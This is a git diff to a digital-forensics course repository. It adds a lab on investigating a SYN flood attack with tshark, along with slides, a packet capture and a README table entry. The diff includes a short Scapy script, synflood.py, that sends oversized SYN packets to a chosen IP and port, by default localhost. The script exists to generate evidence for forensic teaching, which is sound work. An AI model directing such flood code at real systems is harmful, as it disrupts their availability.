diff --git a/Basic_Computer_Skills_for_Forensics/0_Number_Systems.pptx b/Basic_Computer_Skills_for_Forensics/0_Number_Systems.pptx index 9ca2370..40d9c48 100644 Binary files a/Basic_Computer_Skills_for_Forensics/0_Number_Systems.pptx and b/Basic_Computer_Skills_for_Forensics/0_Number_Systems.pptx differ diff --git a/Illegal_Possession_Images/HTTP_tshark_Forensics_1_SYN_Flood.pptx b/Illegal_Possession_Images/HTTP_tshark_Forensics_1_SYN_Flood.pptx new file mode 100644 index 0000000..cbc5b95 Binary files /dev/null and b/Illegal_Possession_Images/HTTP_tshark_Forensics_1_SYN_Flood.pptx differ diff --git a/Illegal_Possession_Images/lab_files/SYN_Flood/mySYNFloodCapture.pcap b/Illegal_Possession_Images/lab_files/SYN_Flood/mySYNFloodCapture.pcap new file mode 100644 index 0000000..2a929e4 Binary files /dev/null and b/Illegal_Possession_Images/lab_files/SYN_Flood/mySYNFloodCapture.pcap differ diff --git a/Illegal_Possession_Images/lab_files/SYN_Flood/synflood.py b/Illegal_Possession_Images/lab_files/SYN_Flood/synflood.py new file mode 100644 index 0000000..1c23cb2 --- /dev/null +++ b/Illegal_Possession_Images/lab_files/SYN_Flood/synflood.py @@ -0,0 +1,11 @@ +from scapy.all import * + +def send_syn(target_ip_address, target_port, number_of_packets_to_send = 4, size_of_packet = 65000): + ip = IP(dst=target_ip_address) + tcp = TCP(sport=RandShort(), dport=target_port, flags="S") + raw = Raw(b"X" * size_of_packet) + p = ip / tcp / raw + send(p, count=number_of_packets_to_send, verbose=0) + print('send_syn(): Sent ' + str(number_of_packets_to_send) + ' packets of '+ str(size_of_packet) + 'size to ' + target_ip_address + ' on port ' + str(target_port)) + +send_syn(target_ip_address = "127.0.0.1", target_port= 80) \ No newline at end of file diff --git a/README.md b/README.md index a351e0d..6b8fbb0 100644 --- a/README.md +++ b/README.md @@ -162,14 +162,15 @@ The [case study](https://github.com/frankwxu/digital-forensics-lab/tree/main/Ill **Topics Covered** -| Labs | Topics Covered | Size of PPTs | -| ----- | --------------------------------------------------------------------------------------------------------------------------------------------- | ------------ | -| Lab 0 | [HTTP Analysis using Wireshark (text)](Illegal_Possession_Images/HTTP_Wireshark_Forensics_1_text.pptx) | 3M | -| Lab 1 | [HTTP Analysis using Wireshark (image)](Illegal_Possession_Images/HTTP_Wireshark_Forensics_2_image.pptx) | 6M | -| Lab 2 | [Rhion Possession Investigation 1: File recovering](Illegal_Possession_Images/Rhion_Possession_1_File_Recovering.pptx) | 9M | -| Lab 3 | [Rhion Possession Investigation 2: Steganography](Illegal_Possession_Images/Rhion_Possession_2_Steganography.pptx) | 4M | -| Lab 4 | [Rhion Possession Investigation 3: Extract Evidence from FTP Traffic](Illegal_Possession_Images/Rhion_Possession_3_FTP_Traffic_crackzip.pptx) | 3M | -| Lab 5 | [Rhion Possession Investigation 4: Extract Evidence from HTTP Traffic](Illegal_Possession_Images/Rhion_Possession_4_HTTP_Traffic.pptx) | 5M | +| Labs | Topics Covered | Size of PPTs | +| ------- | --------------------------------------------------------------------------------------------------------------------------------------------- | ------------ | +| Lab 0 | [HTTP Analysis using Wireshark (text)](Illegal_Possession_Images/HTTP_Wireshark_Forensics_1_text.pptx) | 3M | +| Lab 0.0 | [SYN Flood Attack Investigation using tshark](Illegal_Possession_Images/HTTP_tshark_Forensics_1_SYN_Flood.pptx) | 1M | +| Lab 1 | [HTTP Analysis using Wireshark (image)](Illegal_Possession_Images/HTTP_Wireshark_Forensics_2_image.pptx) | 6M | +| Lab 2 | [Rhion Possession Investigation 1: File recovering](Illegal_Possession_Images/Rhion_Possession_1_File_Recovering.pptx) | 9M | +| Lab 3 | [Rhion Possession Investigation 2: Steganography](Illegal_Possession_Images/Rhion_Possession_2_Steganography.pptx) | 4M | +| Lab 4 | [Rhion Possession Investigation 3: Extract Evidence from FTP Traffic](Illegal_Possession_Images/Rhion_Possession_3_FTP_Traffic_crackzip.pptx) | 3M | +| Lab 5 | [Rhion Possession Investigation 4: Extract Evidence from HTTP Traffic](Illegal_Possession_Images/Rhion_Possession_4_HTTP_Traffic.pptx) | 5M | ### Investigating Email Harassment